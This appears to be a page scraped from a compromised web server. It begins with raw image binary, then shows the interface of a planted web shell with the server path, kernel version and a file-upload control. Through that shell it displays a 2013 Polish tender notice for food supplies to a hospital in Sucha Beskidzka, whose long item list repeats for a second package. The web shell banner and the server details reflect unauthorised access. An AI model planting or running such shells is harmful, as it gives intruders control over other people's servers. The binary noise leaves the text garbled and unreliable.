JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130603/211494-N-2013.html

<p class="kh_header"><b>Sucha Beskidzka: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 211494 - 2013; data zamieszczenia: 03.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spozywczych:
Pakiet nr 1- artykuły ogólnospożywcze
Pakiet nr 2- słodycze
Pakiet nr 3- napoje
Pakiet nr 4- żywność dla dzieci i niemowląt
Pakiet nr 5- jajka
Pakiet nr 6- drób
Pakiet nr 7- pieczarki
Pakiet nr 8- mięso i wędliny
Pakiet nr 9- pieczywo.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.12.00.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania wiedzy i doświadczenia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) sytuacji ekonomicznej i finansowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Zezwolenie organu nadzoru sanitarnego na transport żywności określonym środkiem transportu
Do potwierdzenia odpowiednim dokumentem
2.Dostawca powinien mieć lub mieć podjęte działania wdrożenia systemu HACCP 
Do potwierdzenia oświadczeniem</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy może być dokonana przez strony 
w formie pisemnej w drodze aneksu do niniejszej umowy, pod rygorem nieważności.
2.	Zmiany postanowień niniejszej umowy, są dopuszczalne wyłącznie w przypadku, gdy:
a)	nastąpiło obniżenie ceny jednostkowej asortymentu,
b)	nastąpila zmiana sposobu konfekcjonowania
c)	wprowadzony zostanie do sprzedaży przez wykonawcę produkt zmodyfikowany/ udoskonalony
d)	wystąpił przejściowy brak produktu z przyczyn leżacych po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od  produktu objętego umową.
e)	zmiany stawki podatku VAT - związanej z przedmiotem umowy - w tym przypadku zmianie ulegnie kwota podatku VAT i cena brutto, cena netto pozostanie niezmienna, 
f)	w przypadku zmiany stawki podatku VAT w ramach niniejszej umowy zmiana stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę,
g)	zmiana cen producenta do 5% ceny jednostkowej - w tym przypadku wymagana jest pisemna informacja Dostawcy, z odpowiednim wyprzedzeniem, nie później niż 3 dni przed proponowana zmianą oraz zgoda Zamawiającego,
h)	zmiana cen producenta powyżej 10% ceny jednostkowej - w tym przypadku wymagana jest pisemna informacja Dostawcy, z odpowiednim wyprzedzeniem, nie później niż 3 dni przed proponowana zmianą, udokumentowanie jej zmiany przez producenta w postaci zaświadczenia oraz zgoda Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Zespołu Opieki Zdrowotnej ul. Szpitalna 22, 34-200 Sucha Beskidzka , Blok B, IV piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2013 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej w Suchej Beskidzkiej ul. Szpitalna 22, 34-200 Sucha Beskidzka, Blok C, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spozywczych:
Aromaty do ciast 10 ml	szt	30
Barszcz biały a 66g	szt	700
Barszcz czerwony a 49g	szt	100
Bazylia a 8g	szt	30
Budyń bez cukru 64g	szt	600
Budyń z cukrem a 60g	szt	600
Bulion drobiowy a 10 szt 180g	op	500
Cukier a 1kg	kg	4900
Cukier puder a 0,5kg	kg	300
Cukier waniliowy a 30g	szt	1100
Cynamon a 20g	szt	250
Cytrynka do herbaty a 10g	szt	30
Galaretka a 75g	szt	500
Gałka muszkatałowa 15g	szt	50
Kakao 80g np.. Decomoreno	szt	250
Kakao 150g np.. Decomoreno	szt	30
Kasza gryczana a 1kg	kg	30
Kasza jęczmienna a 1kg	kg	1200
Kasza kukurydziana a 1 kg	kg	50
Kasza manna a 1kg	kg	3700
Kawa zbożowa 0,5 kg 	kg	1100
Herbata granulowana 100 g np.. Indyjska granulowana 	kg	160
Kisiel bez cukru a 38g	szt	200
Kisiel  z cukrem a 77g	szt	300
Kleik ryżowy a 180g	kg	60
Kminek a 20g	szt	200
Kokos a 100g	szt	130
Konserwa szynka polska a 110g	szt	80
Konserwa turystyczna a 130g	szt	80
Konserwa tyrolska a 130g	szt	80
Konserwy rybne a 125 (olej)	szt	200
Konserwy rybne a 125g (pomidor)	szt	200
Kwasek cytrynowy a 50g	szt	350
Liście laurowe a 5g	szt	220
Maga 0,96l	szt	1300
Majeranek a 20g	szt	150
Makaron a 0,5kg (gruby)	kg	1500
Makaron a 0,5kg (łazanka)	kg	500
Makaron a 0,5kg (nitki)	kg	400
Makaron spagetti a 0,5 kg	kg	30
Makaron zacierka 0,25kg	kg	150
Makaron bezglutenowy a 0,5 kg	kg	5
Mąka a 1kg	kg	5600
Mąka kukurydziana a 0,3kg	kg	30
Mąka ziemniaczana a 0,5kg	kg	100
Mąka ziemniaczana a 1kg	kg	650
Morela suszona 150g	szt	30
Ocet 0,45l	szt	600
Olej 0,9l	szt	1200
Olej 3l	szt	650
Olej 5l	szt	50
Oregano 10g	szt	50
Papryka mielona a 20g	szt	300
Pasztet drobiowy a 130g	szt	300
Pasztet drobiowy a 160g	szt	3200
Pasztet drobiowy a 50g	szt	100
Pasztet drobiowy a 90g	szt	100
Pieczywo chrupkie a 210g np.. Wasa 	szt	20
Pieprz mielony a 20g	szt	1400
Płatki kukurydziane a 250g	kg	30
Płatki migdałowe 50g	szt	30
Płatki owsiane a 500g	kg	800
Posypka kakaowe 80g	szt	10
Proszek do pieczenia a 30g	szt	400
Przyprawa do kurczaka 30g	szt	400
Przyprawa do ryb 20g	szt	40
Przyprawa do grila 20g	szt	20
Przyprawa do karkówki 20g	szt	30
Przyprawa do ziemianków 25g	szt	20
Przyprawa do piernika a 25g 	szt 	60
Przyprwa goździki a 10g	szt	100
Przyprwa a 1000g np.. Kucharek 	kg	30
Przyprwa a 200g np.. Kucharek 	kg	300
Rodzynki a 100g	kg	60
Ryż a 1kg	kg	2300
Sezam 	kg	30
Soda a 80g	szt	80
Sól a 1kg	kg	1800
Suchary a 290g	szt	120
Suchary a 290g/ bez cukru	szt	120
Śliwka kalifornijska 100	szt	150
Śmietanka do kawy a 10g w płynie	szt	
Śmietanka w proszku  50g np. Śnieżka 	szt	100
Tarte ciasto a 250g	kg	100
Wafle ryżowe a 130g	szt	30
Ziele angielskie a 15g	szt	230
Żelatyna a 50g	szt	750
Goździki 10g	szt	150
Śmietana spray a 250ml 	szt	20
Zioła prowanalskie 10g	szt	100
Ananas a 560g	szt	220
Brzoskwinie a 850g	szt	250
Chrzan tarty 180g	szt	60
Dżem a 25g	szt	16000
Dżem a 260g	szt	350
Dżem a 280g	szt	350
Dżem a 980g	szt	150
Groszek konserwowy a 400g	szt	500
Ketchup a 1000g	szt	100
Ketchup a 500g	szt	300
Kompot wiśnia a 0,9l	szt	1200
Kururydza konserwowa a 400g	szt	180
Majonez a 250g jogurtowy	szt	
Majonez a 250g np. Kielecki	szt	200
Majonez a 400g np.Winiary	szt	100
Majonez a 500g np. Kielecki	szt	500
Majonez a 700g np. Winiary	szt	30
Miód naturalny a 25g	szt	3500
Miód naturalny a 400g	szt	10
Miód sztuczny a 370g	szt	100
Musztarda a 175g	szt	900
Ogórki konserwowe 0,9l	szt	120
Papryka konserwowa a 0,66l	szt	30
Papryka konserwowa a 0,85l	szt	280
Papryka konserwowa a 370g	szt	30
Pasta pomidorowa 850g np.. Bażant 	szt	600
Pasta pomidorowa 4,5 kg np.. Bażant 	szt	30
Pasta pomidorowa 400g np. . Bażant 	szt	200
Pasta pomidorowa a 200g	szt	100
Pieczarki marynowane 290g	szt	20
Powidła 300g	szt	320
Przetwory Oliwki z papryką 240g	szt	20
Przetwory Oliwki zielone 240g	szt	30
Przetwory Oliwki zielone 100g	szt	20
Sos do spagetti 500g	szt	20
Szpraga konserwowa 370g	szt	30
Pikle a 200g 	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych:
Aromaty do ciast 10 ml	szt	30
Barszcz biały a 66g	szt	700
Barszcz czerwony a 49g	szt	100
Bazylia a 8g	szt	30
Budyń bez cukru 64g	szt	600
Budyń z cukrem a 60g	szt	600
Bulion drobiowy a 10 szt 180g	op	500
Cukier a 1kg	kg	4900
Cukier puder a 0,5kg	kg	300
Cukier waniliowy a 30g	szt	1100
Cynamon a 20g	szt	250
Cytrynka do herbaty a 10g	szt	30
Galaretka a 75g	szt	500
Gałka muszkatałowa 15g	szt	50
Kakao 80g np.. Decomoreno	szt	250
Kakao 150g np.. Decomoreno	szt	30
Kasza gryczana a 1kg	kg	30
Kasza jęczmienna a 1kg	kg	1200
Kasza kukurydziana a 1 kg	kg	50
Kasza manna a 1kg	kg	3700
Kawa zbożowa 0,5 kg 	kg	1100
Herbata granulowana 100 g np.. Indyjska granulowana 	kg	160
Kisiel bez cukru a 38g	szt	200
Kisiel  z cukrem a 77g	szt	300
Kleik ryżowy a 180g	kg	60
Kminek a 20g	szt	200
Kokos a 100g	szt	130
Konserwa szynka polska a 110g	szt	80
Konserwa turystyczna a 130g	szt	80
Konserwa tyrolska a 130g	szt	80
Konserwy rybne a 125 (olej)	szt	200
Konserwy rybne a 125g (pomidor)	szt	200
Kwasek cytrynowy a 50g	szt	350
Liście laurowe a 5g	szt	220
Maga 0,96l	szt	1300
Majeranek a 20g	szt	150
Makaron a 0,5kg (gruby)	kg	1500
Makaron a 0,5kg (łazanka)	kg	500
Makaron a 0,5kg (nitki)	kg	400
Makaron spagetti a 0,5 kg	kg	30
Makaron zacierka 0,25kg	kg	150
Makaron bezglutenowy a 0,5 kg	kg	5
Mąka a 1kg	kg	5600
Mąka kukurydziana a 0,3kg	kg	30
Mąka ziemniaczana a 0,5kg	kg	100
Mąka ziemniaczana a 1kg	kg	650
Morela suszona 150g	szt	30
Ocet 0,45l	szt	600
Olej 0,9l	szt	1200
Olej 3l	szt	650
Olej 5l	szt	50
Oregano 10g	szt	50
Papryka mielona a 20g	szt	300
Pasztet drobiowy a 130g	szt	300
Pasztet drobiowy a 160g	szt	3200
Pasztet drobiowy a 50g	szt	100
Pasztet drobiowy a 90g	szt	100
Pieczywo chrupkie a 210g np.. Wasa 	szt	20
Pieprz mielony a 20g	szt	1400
Płatki kukurydziane a 250g	kg	30
Płatki migdałowe 50g	szt	30
Płatki owsiane a 500g	kg	800
Posypka kakaowe 80g	szt	10
Proszek do pieczenia a 30g	szt	400
Przyprawa do kurczaka 30g	szt	400
Przyprawa do ryb 20g	szt	40
Przyprawa do grila 20g	szt	20
Przyprawa do karkówki 20g	szt	30
Przyprawa do ziemianków 25g	szt	20
Przyprawa do piernika a 25g 	szt 	60
Przyprwa goździki a 10g	szt	100
Przyprwa a 1000g np.. Kucharek 	kg	30
Przyprwa a 200g np.. Kucharek 	kg	300
Rodzynki a 100g	kg	60
Ryż a 1kg	kg	2300
Sezam 	kg	30
Soda a 80g	szt	80
Sól a 1kg	kg	1800
Suchary a 290g	szt	120
Suchary a 290g/ bez cukru	szt	120
Śliwka kalifornijska 100	szt	150
Śmietanka do kawy a 10g w płynie	szt	
Śmietanka w proszku  50g np. Śnieżka 	szt	100
Tarte ciasto a 250g	kg	100
Wafle ryżowe a 130g	szt	30
Ziele angielskie a 15g	szt	230
Żelatyna a 50g	szt	750
Goździki 10g	szt	150
Śmietana spray a 250ml 	szt	20
Zioła prowanalskie 10g	szt	100
Ananas a 560g	szt	220
Brzoskwinie a 850g	szt	250
Chrzan tarty 180g	szt	60
Dżem a 25g	szt	16000
Dżem a 260g	szt	350
Dżem a 280g	szt	350
Dżem a 980g	szt	150
Groszek konserwowy a 400g	szt	500
Ketchup a 1000g	szt	100
Ketchup a 500g	szt	300
Kompot wiśnia a 0,9l	szt	1200
Kururydza konserwowa a 400g	szt	180
Majonez a 250g jogurtowy	szt	
Majonez a 250g np. Kielecki	szt	200
Majonez a 400g np.Winiary	szt	100
Majonez a 500g np. Kielecki	szt	500
Majonez a 700g np. Winiary	szt	30
Miód naturalny a 25g	szt	3500
Miód naturalny a 400g	szt	10
Miód sztuczny a 370g	szt	100
Musztarda a 175g	szt	900
Ogórki konserwowe 0,9l	szt	120
Papryka konserwowa a 0,66l	szt	30
Papryka konserwowa a 0,85l	szt	280
Papryka konserwowa a 370g	szt	30
Pasta pomidorowa 850g np.. Bażant 	szt	600
Pasta pomidorowa 4,5 kg np.. Bażant 	szt	30
Pasta pomidorowa 400g np. . Bażant 	szt	200
Pasta pomidorowa a 200g	szt	100
Pieczarki marynowane 290g	szt	20
Powidła 300g	szt	320
Przetwory Oliwki z papryką 240g	szt	20
Przetwory Oliwki zielone 240g	szt	30
Przetwory Oliwki zielone 100g	szt	20
Sos do spagetti 500g	szt	20
Szpraga konserwowa 370g	szt	30
Pikle a 200g 	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
